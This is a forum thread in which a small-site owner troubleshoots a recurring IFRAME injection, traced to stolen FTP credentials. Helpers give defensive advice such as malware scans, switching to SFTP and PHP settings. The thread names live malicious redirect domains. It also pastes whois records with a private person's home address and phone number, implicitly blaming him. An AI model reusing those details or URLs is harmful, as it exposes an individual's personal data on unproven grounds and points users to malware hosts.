Hello all,
I’m having a problem with an IFRAME injection. I didn’t even know these existed until this week so I apologise for any silly noob assumptions/mistakes on my part.
I run a small website to showcase my photography. Nothing flashy. It contains some PHP to act as a feedreader for my blog (using MagpieRSS) and also to generate some random quotes in the footer. It contains some javascript for Google Analytics and also Google Ads. Other than this it’s a mix of XHTML and CSS.
Anyway, on with the problem! Earlier this week I did an FTP upload using Filezilla. The next day I checked my site online and noticed that the layout was looking a bit off, there was some padding of about 200px at the top of the screen.
My first thought was that I’d mistyped some CSS which was messing with a height property but it actually turned out to be an IFRAME in the HTML of my index page.
After some further reading I figured out I’d been attacked with some badware. Joy.
So, I did a full virus scan of my home computer (using AVG), I then changed my FTP password to a nice strong upper case/lower case/alpha/numeric mix and re-uploaded my site from my home computer. I also made sure FIlezilla wasn’t storing my password anymore as it had done previously.
Today another IFRAME has appeared!
Could one of you fine people inform me of the best way to clean up my site?
I have contacted my hosting company for help (Fasthosts.co.uk), they have told me they don’t deal with CSS issues(!?!?).
For reference, my site is www.ambientbuzzsaw.co.uk and the IFRAME only seems to be appearing on the index page.
Many thanks in advance for your help!
We’ve had good results with AVG but you might want to also try Malwarebytes.
Reading the sequence of events, it does seem like it’s some local PC infection stealing your FTP credentials. It’s not just that they’re (cybercriminals – I prefer the term hackers, but many don’t) stealing stored passwords, we’ve seen instances where the infection (virus/trojan/worm) is “sniffing” the FTP credentials. Since FTP transmits all data in plain text, it’s easy for them to capture your username, password and destination send it to a server and then run an automated script to inject their code into your webpage.
Ask Fasthosts.co.uk about how you could switch from FTP to either SFTP or FTPS. Then your login credentials are much more difficult to sniff as these protocols encrypt all traffic.
Please try Malwarebytes and then contact your hosting provider about switch protocols.
Keep the forum here posted on your results/updates so everyone can learn from your experience. Much as you turned to the forum here for help, others do as well.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Thank you for the advice Thomas, I had no idea that FTP was so insecure. I kind of expected everything to be encrypted, a dangerous presumption!
Going on your advice, I think my next steps are:
-Take my site down
-Perform another system scan of my PC with AVG and Malwarebytes.
-Await a response from Fasthosts and enquire about switching to a more secure FTP protocol.
-Change passwords again to be safe.
-Re-upload and hope for the best.
Thanks once again for your advice, I’ll keep you posted on my progress. I’m currently waiting for a reply from my last email to Fasthosts where I told them in no uncertain terms that this was not a CSS issue.
avg,
malwarebytes,
cybercrimials,
hakers,
ftp,
sftp,
ftps,
fasthosts,
iframe,
injection
|
We once had a hosting provider tell us that the problem our client was having was due to an html error and they can’t be expected to be html experts. This was after we scanned 832 websites on the same shared hosting server as our client and found all of them had the same infection. Coincidence? I think not.
In the defense of hosting providers though, I know they’re being squeezed. On one hand they have to lower monthly fees in order to compete. On the other hand they have to provide as much technical support as they possibly can.
Just my opinion.
Please keep the forum informed on your findings/progress.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Recently dealing with a similiar issue.
Few different things on this..
One it appears to effect older wordpress installs.
Its also a link injection that appends code to the end of files specifically named index.php
It also looks for body tags and appends a line at that level.
It is a link injection, meaning they don’t have ftp or root access to the site.
We are still investigating this issue and as more information is available we will post it for you.
Added…
Couple of things to note..
The website that it tries to shoot you to and registration information.
Domain Name: shopmovielife.cn
ROID: 20081007s10001s46382980-cn
Domain Status: clientTransferProhibited
Registrant Organization: Scott Bell
Registrant Name: Scott Bell
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.freednshostway.com
Name Server:ns2.freednshostway.com
Registration Date: 2008-10-07 04:53
Expiration Date: 2009-10-07 04:53
Then the freednshostway.com [ their possible provider ]
Domain Tools
Whois
Domain Search Domain Suggestions For Sale Sales History Auction Search Aftermarket.com Live Auctions Domain Monitor
Domain Directory Ping
Traceroute
My IP Address Domain Parking Cheap Domain Name Registration Bulk Check Domain Typo Generator more >
Power Tools: Reverse IP Domain History Mark Alert Name Server Spy Hosting History Registrant Search Registrant Alert
Main Content
Whois Record for Freednshostway.com ( Free Dns Hostway ) Change Word BreaksFront Page Information
Website Title: None given.
AboutUs: Wiki article on Freednshostway.com
Indexed Data
Alexa Trend/Rank: #4,680,283: Up 31,979 ranks over the last three months.
Registry Data
ICANN Registrar: ONLINENIC, INC.
Created: 2009-02-19
Expires: 2010-02-19
Updated: 2009-05-10
Registrar Status: ok
Name Server: NS1.FREEDNSHOSTWAY.COM (has 3 domains)
Name Server: NS2.FREEDNSHOSTWAY.COM (has 3 domains)
Whois Server: whois.onlinenic.com
Server Data
IP Address: 95.129.144.210 Whois | Reverse-IP | Ping | DNS Lookup | Traceroute
IP Location – United Kingdom – Ventrex Llp Customers
Response Code:
Domain Status: Registered And Active Website
DomainTools Exclusive
Registrant Search: “Pavel Eroshkin” owns about 439 other domains
Registrar History: 1 registrar
NS History: 2 changes on 3 unique name servers over 0 year.
IP History: 2 changes on 3 unique name servers over 0 years.
Whois History: 9 records have been archived since 2009-02-20.
Reverse IP: 1 other site is hosted on this server.
Monitor Domain: Set Free Alerts on freednshostway.com
Free Tool: Download DomainTools for Windows
Whois Record
Registrant:
Pavel Eroshkin +7.8464331773
Pavel Eroshkin
50 Let Oktyabrya str. d.69 kv.46
Syzran,Samarskaya,RU 446000
Domain Name:freednshostway.com
Record last updated at 2009-05-10 13:54:49
Record created on 2009/2/19
Record expired on 2010/2/19
Domain servers in listed order:
ns1.freednshostway.com ns2.freednshostway.com
Administrator:
Pavel Eroshkin +7.8464331773
Pavel Eroshkin
50 Let Oktyabrya str. d.69 kv.46
Syzran,Samarskaya,RU 446000
Technical Contactor:
Pavel Eroshkin +7.8464331773
Pavel Eroshkin
50 Let Oktyabrya str. d.69 kv.46
Syzran,Samarskaya,RU 446000
Billing Contactor:
Pavel Eroshkin +7.8464331773
Pavel Eroshkin
50 Let Oktyabrya str. d.69 kv.46
Syzran,Samarskaya,RU 446000
Registration Service Provider:
name: dnregistrar.ru
tel: +7.4955041111
fax: +7.4955041111
web:http://www.dnregistrar.ru
The owner of the last recorded ip for that server is
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 95.0.0.0 – 95.255.255.255
CIDR: 95.0.0.0/8
NetName: 95-RIPE
NetHandle: NET-95-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS2.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2007-07-30
Updated: 2009-05-18
Also we already submitted an abuse report to them.
<del>-</del>————————————————————-
Robert Moore
Senior Technician
Digital Insights
http://www.digitalinsights.biz
Two things to note from the hosting provider side.
You need to make sure
disable the entries in /usr/local/lib/php.ini file.
============
root@web01 [~]# grep register_globals /usr/local/lib/php.ini
register_globals = Off
root@web01 [~]# grep allow_url_fopen /usr/local/lib/php.ini
allow_url_fopen = Off
============
the lines above tell you how to check
They should be OFF
<hr />also the default install of mod_security prevents this attack from crossing to multiple users.
Robert Moore
Senior Technician
Digital Insights
http://www.digitalinsights.biz
all good points. :-)
-A
Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
www.stopthehacker.com
Jaal: Protecting the Internet, one website at a time™
Thomas, if you come across a similar situation in the future with a hosting provider playing (or being) dumb about a mass infection, let us know. We have relationships with many hosting companies, and we also sometimes have luck using our bully pulpit to influence them to clean up.
That’s good to know. It’s like calling in a big brother to even out a fight. Or a brother-in-law who just retired from 20 years in the Army Special Forces – I’m just sayin’.
I like it.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Quick update:
Site is now offline, currently running an AVG scan to be followed by a malwarebytes scan. AVG is about 50% done and has already picked up 3 trojans and a HTML Framer virus. Will post the full results later today.
Still no response from Fasthosts and I have been unable to establish whether I can use SFTP/FTPS from their help files.
@RobertMoore
I’ve checked my PHP settings:
allow_url_fopen = On
register_globals = Off
My initial concern was that MagpieRSS (powers my blog page) would rely on allow_url_fopen being turned on. I’m relieved to say that this is not the case and according to their website it will function even if allow_url_fopen = Off.
Unfortunately, I’m just one man on a massive Fasthosts server so I’m guessing they won’t be letting me play with PHP.ini. Have gone and done some quick reading and identified that I can possibly alter settings using htaccess:
http://www.karakas-online.de/EN-Book/htaccess-file.html
http://www.karakas-online.de/EN-Book/change-php-parameters.html
http://corz.org/serv/tricks/htaccess.php
Am I barking up the right tree here?
Oh and one other thing, not sure if it’s of any use but when this first happened (ie before my first attempt at fixing the problem) the IFRAME was pointing at the following url:
http://greatshopfilm.cn:8080/index.php
Turns out I have one sick computer!
AVG Results:
Trojan horse SHeur2.AKXF";“Moved to Virus Vault
Trojan horse SHeur2.AKXF”;“Moved to Virus Vault
Trojan horse Exploit_c.AHV”;“Moved to Virus Vault
Virus found HTML/Framer”;"Moved to Virus Vault
Malwarebytes results:
Registry Keys Infected:
(Adware.MyWebSearch) → Quarantined and deleted successfully.
Registry Values Infected:
(Trojan.Agent) → Quarantined and deleted successfully.
(Trojan.FakeAlert) → Quarantined and deleted successfully.
(Trojan.FakeAlert) → Quarantined and deleted successfully.
Registry Data Items Infected:
(Broken.OpenCommand) → Bad: (“regedit.exe” “%1”) Good: (regedit.exe “%1”) → Quarantined and deleted successfully.
Files Infected:
(Trojan.DNSChanger) → Quarantined and deleted successfully.
(Trojan.Agent) → Quarantined and deleted successfully.
(Trojan.Agent) → Quarantined and deleted successfully.
(Trojan.DNSChanger) → Quarantined and deleted successfully.
(Trojan.FakeAlert) → Quarantined and deleted successfully.
(Heuristics.Malware) → Quarantined and deleted successfully.
(Malware.Trace) → Quarantined and deleted successfully.
Call me paranoid but I’m going to run another scan just to make sure…
Response from Fasthosts:
<hr />“Thanks for contacting us with your support enquiry.
It seems that you have been script injected by some one online entering malicious script through your site.
I recommend you take a look at the scripts and then work to a solution be removing it and making it secure to prevent it from happening in the future"
<hr />I’ve replied and asked for information about switching to SFTP/FTPS.
Do you have access to the logs from right before your site was infected until now?
If so, we’d like to run them through our analyzer to see what “script injection” they’re talking about.
Let us know and you can contact us off list to provide access to your logs. The clue might be in the log files.
Thank you for the update.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Thomas, have sent the log files to the email address in your signature.
I’ve had another response from Fasthosts saying they don’t currently offer SFTP/FTPS but that they are planning it for the future.
Thank you.
We ran the log files through our analyzer and also inspected them manually and we see nothing that would indicate an injection attack. Just for your information, an injection would have to be delivered via an HTTP POST or via a GET if it were a remote file include. Your log files show no such action. Nothing but GETs and HEADs but no POSTs or PUTs and the GETs were for files local to your website with no extraneous query strings so it wasn’t a remote file include.
On this page: http://www.php.net/manual/en/features.remote-files.php
It states, “You can also write to files on an FTP server (provided that you have connected as a user with the correct access rights). You can only create new files using this method; if you try to overwrite a file that already exists, the fopen() call will fail.”
Again going back to compromised FTP credentials.
If you can disable allow_url_fopen then you should.
I’m curious, does your host offer SSH access to your site? That is quite odd that they wouldn’t offer SFTP or FTPS.
I’m not saying that this couldn’t be an injection attack I just wonder how people can claim that’s what it is without any proof.
If anyone can shed light on this, please enlighten me.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Thomas is right. If it were a code injection attack, albeit a rudimentary one, it would show up on your log files. And yes, it does surprise me too that your host is not suggesting ssh based access.
Is your ISP fashosts.co.uk? they see to have been hacked some time back. They are one of the big guys and if they don’t offer a more secure way than vanilla ftp, it is very surprising indeed.
-A
Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
www.stopthehacker.com
Jaal: Protecting the Internet, one website at a time™
Thomas – Thank you for looking at my log files and for your feedback. As I mentioned in my initial post, this is all a bit new to me! So am I right in thinking that (in layman’s terms) an ‘injection’ is an attack where they get the server to run a malicious PHP script but in my case I’ve just had my FTP log-in details stolen by one of the many, many trojans on my computer?
At any rate, I’ll take your advice and do some more research into how I can turn off allow_url_fopen via HTaccess and hopefully that’ll improve my security.
Anirban – Fasthosts.co.uk host my site, I queried them specifically about SFTP and FTPS as alternatives to straight up FTP, I’ve pasted their response below:
“Thanks for contacting us with your support enquiry.
Unfortunately not as this is not something we currently have in place.
However in future we are considering these are an improvement.
Regards
Thanks again for contacting us."